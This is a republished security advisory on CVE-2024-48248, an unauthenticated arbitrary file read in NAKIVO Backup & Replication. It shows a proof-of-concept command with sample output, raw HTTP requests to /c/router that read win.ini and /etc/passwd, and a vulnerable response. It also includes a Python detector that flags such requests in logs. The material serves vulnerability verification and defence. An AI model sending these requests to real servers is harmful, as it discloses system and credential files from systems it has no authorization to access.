NAKIVO arbitrary file read (CVE-2024-48248)

admin, 18 March 2025 21:12:54, 20 views, 2447 characters, 8 min 9 s read

The location of the PoC for verifying the vulnerability is given at the end of the article.

Affected versions: NAKIVO Backup & Replication 10.11.3.86570 and below
Usage:

python3 watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py --url https://192.168.1.1:4443 --file "C:\windows\win.ini"

Output:

watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py
(*) Nakivo Unauthenticated Arbitrary File Read (CVE-2024-48248) POC by watchTowr
- Sonny, watchTowr ([email protected])
CVEs: [CVE-2024-48248]
[*] Targeting https://192.168.1.1:4443
[*] Attempting to read file 'C:\windows\win.ini'
[*] File Contents:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Source of the original analysis:
https://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248/
Manual verification:
Send the following request.
Windows
POST /c/router HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Connection: keep-alive
Content-Length: 121

{"action":"STPreLoadManagement","method":"getImageByPath","data":["C:/windows/win.ini"],"type":"rpc","tid":3980,"sid":""}
Linux
POST /c/router HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Connection: keep-alive
Content-Length: 114

{"action":"STPreLoadManagement","method":"getImageByPath","data":["/etc/passwd"],"type":"rpc","tid":3980,"sid":""}
If the response looks like the following, the target is vulnerable. The data array in the response body holds the contents of the requested file as decimal byte values; here it decodes to the win.ini shown above.
HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Strict-Transport-Security: max-age=31536000; includeSubDomains
Cache-Control: max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 466
Keep-Alive: timeout=60
Connection: keep-alive

{"action":"STPreLoadManagement","method":"getImageByPath","tid":"3980","type":"rpc","message":null,"where":null,"cause":null,"data":[59,32,102,111,114,32,49,54,45,98,105,116,32,97,112,112,32,115,117,112,112,111,114,116,13,10,91,102,111,110,116,115,93,13,10,91,101,120,116,101,110,115,105,111,110,115,93,13,10,91,109,99,105,32,101,120,116,101,110,115,105,111,110,115,93,13,10,91,102,105,108,101,115,93,13,10,91,77,97,105,108,93,13,10,77,65,80,73,61,49,13,10]}
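A detection check built from the request and response shapes above, added here as an example; it is not from the original post nor from watchTowr's PoC. It flags /c/router calls to STPreLoadManagement.getImageByPath that carry an empty sid (the unauthenticated pattern), and for incident response decodes the decimal byte array of a captured response to show what was actually disclosed. The log entries and the truncated response are constructed samples.

```python
import json
from typing import Optional

# Constructed sample (path, body) pairs, as a reverse proxy or WAF might log them.
SAMPLE_REQUESTS = [
    ("/c/router", '{"action":"STPreLoadManagement","method":"getImageByPath",'
                  '"data":["C:/windows/win.ini"],"type":"rpc","tid":3980,"sid":""}'),
    ("/c/router", '{"action":"STPreLoadManagement","method":"getImageByPath",'
                  '"data":["/etc/passwd"],"type":"rpc","tid":3981,"sid":""}'),
    ("/c/router", '{"action":"AuthenticationManagement","method":"login",'
                  '"data":["user","pass"],"type":"rpc","tid":1,"sid":""}'),
    ("/c/login", "not json at all"),
]

# Constructed, truncated response body in the same shape as the one shown above.
SAMPLE_RESPONSE = ('{"action":"STPreLoadManagement","method":"getImageByPath","tid":"3980",'
                   '"type":"rpc","data":[59,32,102,111,114,32,49,54,45,98,105,116,32,'
                   '97,112,112,13,10,91,102,111,110,116,115,93,13,10]}')


def flag_request(path: str, body: str) -> Optional[str]:
    """Return a reason if the request matches the CVE-2024-48248 pattern, else None."""
    if path != "/c/router":
        return None
    try:
        rpc = json.loads(body)
    except ValueError:
        return None  # not a JSON-RPC body; nothing to inspect here
    if rpc.get("action") != "STPreLoadManagement" or rpc.get("method") != "getImageByPath":
        return None
    data = rpc.get("data") or []
    target = data[0] if data and isinstance(data[0], str) else ""
    # An empty sid means the call was made without an authenticated session.
    if not rpc.get("sid"):
        return f"unauthenticated getImageByPath for {target!r}"
    return f"authenticated getImageByPath for {target!r} (review)"


def scan(requests):
    """Run flag_request over logged (path, body) pairs and keep the hits."""
    return [(path, reason) for path, body in requests if (reason := flag_request(path, body))]


def decode_disclosed(response_body: str) -> str:
    """Turn the decimal byte array of a /c/router response into text to assess impact."""
    data = json.loads(response_body).get("data") or []
    return bytes(data).decode("utf-8", errors="replace")
```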

Originally published on the WeChat public account 爱坤sec: nakivo-任意文件读取(CVE-2024-48248)

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site bears no legal or joint liability. For any issues, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).
Published by admin on 18 March 2025 21:12:54.
When reposting, please keep the source link (CN-SEC中文网; thanks to the original author for their work): NAKIVO arbitrary file read (CVE-2024-48248), https://cn-sec.com/archives/3852648.html